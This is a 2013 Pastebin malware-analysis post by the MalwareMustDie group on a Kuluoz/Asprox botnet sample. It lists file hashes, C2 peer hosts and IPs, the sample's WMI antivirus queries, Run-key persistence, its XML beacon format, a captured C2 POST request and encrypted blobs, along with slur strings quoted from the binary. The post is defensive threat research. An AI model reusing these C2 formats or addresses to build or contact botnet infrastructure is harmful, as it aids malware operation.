API tools faq
paste
Advertisement
MalwareMustDie

BOTNET KULUOZ/ ASPROX BACK WITH NEW EXCYPTION

MalwareMustDie
Nov 12th, 2013
1,926
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.83 KB | None | 0 0
raw download clone embed print report
  1. ==========================
  2. #MalwareMustDie
  3. BOTNET KULUOZ/ ASPROX BACK WITH NEW EXCYPTION
  4. @unixfreaxjp /malware/temp]$ date
  5. Tue Nov 12 22:23:08 JST 2013
  6.  
  7. Peers (host) with ports 8080:
  8.  
  9. 66-29-254-132.ds1-static.mia1.net.ststelecom.com
  10. mail.colegioamazonas.edu.ec
  11. hosted-by.shineservers.com
  12. host.colocrossing.com
  13. web.globalcell.ge
  14. gunnebojohnson.com
  15. ==========================
  16.  
  17.  
  18. SAMPLE ANALYZED:
  19.  
  20. https://www.virustotal.com/en/file/1b78b14147d61ea245e588eb208c49bf678da968938751155f06d0f2a8a189b1/analysis/
  21.  
  22. MD5 ec52855b7e522a977330519a8a201993
  23. SHA1 b09e1a0fb067f2114e186bba5d848dbd7d663325
  24. SHA256 1b78b14147d61ea245e588eb208c49bf678da968938751155f06d0f2a8a189b1
  25.  
  26. // ==============================
  27. // QUICK REVERSING ANALYSIS:
  28. // ==============================
  29.  
  30. // Accessing the Security Center:
  31.  
  32. ROOT\SecurityCenter
  33. ROOT\SecurityCenter2
  34. SELECT * FROM AntiVirusProduct
  35.  
  36. ROOT\SecurityCenter
  37. ROOT\SecurityCenter2
  38. SELECT * FROM FirewallProduct
  39.  
  40.  
  41. // Grabbing Which ssolution you usd:
  42.  
  43. displayName
  44.  
  45.  
  46. // Series of request POST command:
  47. // explanation: The URL name and port numbers are in variables , for proxies.
  48.  
  49.  
  50. http://%[^:]:%d/%s
  51.  
  52. // UserAgent Used is Static (not variable) PlainText in binary (Need to decrypt to see it)
  53. // The method is POST
  54. // The hash for request was structured "yvy5VtvLVvh6soaja2YuyfrC" in my case.
  55. // plaintext was used for the form of POST to fetch name="key"; filename="key.bin" and name="data"; filename="data.bin"
  56. // It is bind to :svchost.exe
  57.  
  58. Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
  59. GET
  60. yvy5VtvLVvh6soaja2YuyfrC
  61. svchost.exe
  62. Content-Type: multipart/form-data; boundary=
  63. Content-Disposition: form-data; name="key"; filename="key.bin"
  64. Content-Type: application/octet-stream
  65. svchost.exe
  66. Content-Disposition: form-data; name="data"; filename="data.bin"
  67. Content-Type: application/octet-stream
  68. Content-Length: %d
  69.  
  70. // Requested command:
  71.  
  72. /index.php?r=gate
  73.  
  74. Which posting infected ID data of:
  75.  
  76. <knock><id>%s</id><group>%s</group><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>
  77.  
  78.  
  79. // Yes, it is supposed to autorun in:
  80.  
  81. Software\Microsoft\Windows\CurrentVersion\Run
  82.  
  83. // Self-copied:
  84.  
  85. C:\Documents and Settings\User\Local Settings\Application Data\goktqtbh.exe (RANDOM..)
  86.  
  87. // Kicking Notedpad:
  88.  
  89. 0x4c0 svchost.exe C:\WINDOWS\system32\svchost.exe
  90. 0x768 notepad.exe C:\WINDOWS\system32\NOTEPAD.EX
  91.  
  92. with text...
  93.  
  94. FATAL ERROR! Error while open file.
  95.  
  96. (hex: 464154414C204552524F5221204572726F72207768696C65206F70656E2066696C652E00 )
  97.  
  98.  
  99. // Botnet (fake?) version..
  100.  
  101. 1.0.6, 6-Sept-2010
  102.  
  103.  
  104. // Still the same Rant detected.. see my previous pastebin:
  105.  
  106. You fag!!!!!
  107. You fag!!!!!
  108. You fag!!!!!
  109. You fag!!!!!
  110. You fag!!!!!
  111. You fag!!!!!
  112. You fag!!!!!
  113. You fag!!!!!
  114. You fag!!!!!
  115. You fag!!!!!
  116.  
  117. // Added with these:
  118.  
  119. For base!!!!!
  120. For base!!!!!
  121. For base!!!!!
  122. For base!!!!!
  123. For base!!!!!
  124. For base!!!!!
  125. For base!!!!!
  126.  
  127.  
  128. // ==================
  129. // ENCRYPTION TRACES
  130. // ==================
  131.  
  132. // Data was encrypted using:
  133.  
  134. Microsoft Base Cryptographic Provider v1.0
  135.  
  136. // Public Key Traces...
  137.  
  138. -----BEGIN PUBLIC KEY-----
  139. jjj
  140. jjj
  141. jjj
  142. jjj
  143. jjj
  144. APH
  145. dLJ1rmxx+bAndp+Cz6+5I
  146. Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqw
  147. jwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U
  148. 00SNFZ88nyVv33z9+wIDAQAB
  149. -----END PUBLIC KEY-----
  150.  
  151.  
  152. // Lotta MD5..
  153.  
  154. MD5Init
  155. MD5Update
  156. MD5Final
  157.  
  158.  
  159. =============================
  160. RESPONSE FROM KULUOZ PEERS
  161. ============================
  162.  
  163.  
  164. // DOWNLOADED DATA...
  165.  
  166.  
  167. // data.bin
  168.  
  169. 0000 FD B1 64 DF 81 18 D7 F6 9D CB 3A 79 48 B9 BC B9 ..d.......:yH...
  170. 0010 1E FC C4 7C 3B 1B 0D BF 7A 3E DA 98 4D 09 C3 1B ...|;...z>..M...
  171. 0020 81 CF EF DF 4E 3A DA ED 69 B0 B9 3E 2F 45 BA 09 ....N:..i..>/E..
  172. 0030 B5 6C 06 71 D1 A7 15 AA EF B9 A9 7D 27 81 F3 BA .l.q.......}'...
  173. 0040 92 F6 B7 46 95 C0 06 03 02 DD 0B C1 D9 96 90 27 ...F...........'
  174. 0050 5F E5 FB E7 B8 C2 9A C8 72 85 A4 41 F5 2F B0 5A _.......r..A./.Z
  175. 0060 C4 D8 D8 9C 1A 00 63 C3 24 39 6F 23 DA 96 89 63 ......c.$9o#...c
  176. 0070 F2 8D 0D 15 B3 29 40 D4 91 1B 07 18 22 7E ED B4 .....)@....."~..
  177. 0080 56 FE D4 42 CF C2 8C 97 19 A9 99 E8 4B 1C 72 9C V..B........K.r.
  178. 0090 9B 4F AA DF A2 BB BE 72 58 11 7E 8C E1 0A 59 .O.....rX.~...Y
  179.  
  180.  
  181. // ===> This is suppose to be like this: (only example)
  182. // But can not figure the encryption yet...
  183. // All previous attempt failed...
  184.  
  185. 0000 31 34 39 2e 32 31 30 2e 31 33 30 2e 31 38 3a 39 149.210.130.18:9
  186. 0010 39 33 0a 31 38 36 2e 31 31 32 2e 32 31 34 2e 31 93.186.112.214.1
  187. 0020 35 38 3a 38 30 38 30 0a 32 30 32 2e 32 39 2e 32 58:8080.202.29.2
  188. 0030 32 39 2e 32 33 32 3a 38 30 38 30 0a 31 37 38 2e 29.232:8080.178.
  189. 0040 32 30 38 2e 33 35 2e 31 39 30 3a 38 30 38 30 0a 208.35.190:8080.
  190. 0050 36 34 2e 37 36 2e 31 39 2e 32 34 31 3a 38 30 38 64.76.19.241:808
  191. 0060 30 0a 39 35 2e 31 37 33 2e 31 38 36 2e 31 38 34 0.95.173.186.184
  192. 0070 3a 38 30 38 30 0a 31 37 36 2e 31 32 32 2e 32 32 :8080.176.122.22
  193. 0080 34 2e 36 32 3a 38 30 38 30 0a 38 32 2e 31 39 32 4.62:8080.82.192
  194. 0090 2e 39 31 2e 32 32 34 3a 38 30 38 30 0a 38 34 2e .91.224:8080.84
  195.  
  196.  
  197.  
  198. // key.bin (dunno about this yet...)
  199.  
  200. 0000 50 AA B1 3A 7E 51 02 90 D7 D4 C1 0D 52 48 AF EE P..:~Q......RH..
  201. 0010 EA 86 86 6F D3 96 EF 15 22 98 35 B9 15 96 2D B1 ...o....".5...-.
  202. 0020 27 83 2E DE B7 3B B5 EB BA 74 78 E8 22 28 5D 49 '....;...tx."(]I
  203. 0030 B8 B1 00 A0 3C 10 D0 95 EB 03 67 7C 51 06 3B D7 ....<.....g|Q.;.
  204. 0040 1A 95 1E 7E BF 65 C0 CC 36 C2 D0 A2 E3 6D 24 F9 ...~.e..6....m$.
  205. 0050 9A CE D0 26 1B 0A A4 5E 6F FA 50 80 6C 22 57 24 ...&...^o.P.l"W$
  206. 0060 26 D9 2F 0D EE F4 80 31 8D 26 24 DC 86 00 D0 DB &./....1.&$.....
  207. 0070 CF 31 EE C1 CF 9D AA EC 83 3C 99 75 ED 76 62 45 .1.......<.u.vbE
  208.  
  209.  
  210. // encrypted request in POST request...: ps: yvy5VtvLVvh6soaja2YuyfrC is my hashed PC ID
  211.  
  212.  
  213. // HEADER;
  214.  
  215. POST /3D498A785E9515E72E2C4E241766ADFDF3DFED4670 HTTP/1.1
  216. Accept: */*
  217. Content-Type: multipart/form-data; boundary=yvy5VtvLVvh6soaja2YuyfrC
  218. Content-Length: 592
  219. User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
  220. Host: 220.67.211.23:8080
  221. Cache-Control: no-cache
  222.  
  223. // DATA...
  224.  
  225. yvy5VtvLVvh6soaja2YuyfrC
  226. Content-Disposition: form-data; name="key"; filename="key.bin"
  227. Content-Type: application/octet-stream
  228.  
  229. ......ON?..u..Y..1.Kf`!.9.*...~.........Ey..p..[>_..S..4/%.N.L4....D.d.....)
  230. .V....56b.k..E....z.'l.......*..3.h..........w....N
  231. --yvy5VtvLVvh6soaja2YuyfrC
  232.  
  233. Content-Disposition: form-data; name="data"; filename="data.bin"
  234. Content-Type: application/octet-stream
  235.  
  236. .:.U.7T.I..O.{ym....,.i...&.s....U.|....|..z.....$&.........e..v+.6.[....3..........C...W..". h...&I..$t
  237. /E..4....<KOk....Qt..m.4~.Q|".I..U..u....")a_z$#d..j...
  238. --yvy5VtvLVvh6soaja2YuyfrC--
  239.  
  240.  
  241. // The two blobs of encryption above are:....
  242.  
  243. 442E2E34492E2E54432E2E7B2E750D5335502E2E2E2E2E2E52
  244. 2E2E33792D2E2E2F2E34202E5D5F2E3F412E492E2E2B4D2E2E
  245. 2E3F553F2E71552E4B232E0D0A2C2E2E202E2E542E2E2E0D2E
  246. 2B2E2E26502E2E2E432E2E4D212E2E2E5C2E2E272E2E734157
  247. 782E2E3E2E2E2E2E2E2E2E2E2E2E2E2E302E2E412E395B2E61
  248. 6D2E2E2E0D0D0A
  249.  
  250.  
  251. 5F2E462E2E2E2E2E622E2E2E4A232E312E2E2E63326D522E6D
  252. 212E502E262E6A2E2E2E2E2E2E682E532E2E332E2E2E2E7E2E
  253. 2E2E2E2E2E2E3D482E2E2E2E2E74642E5D4F2E2E2E2E2E2E78
  254. 6B2E6E752E502E2E2E2E2E2E5D412E2E2E322E6B2E2E2E2E2E
  255. 362E7C2E2E2E2E372E4A2E2E2E2E2E78367C7E2E2E512E2E39
  256. 2E5A2E2E352E67402E2E2E2E2E2E0D0A7B3C7C2E2E73395B2E
  257. 7D2E662E712E652E460D0D0A
  258.  
  259. // ==> this is supposed to be like this to be matched.. (from binary reversing)
  260. // we need to know encryption used to popped the values of
  261.  
  262. id, group, time, version, status and debug.
  263.  
  264. <knock><id>%s</id><group>%s</group><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>
  265.  
  266.  
  267. Pleae take this research from here..
  268.  
  269. ---
  270. #MalwareMustDie!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!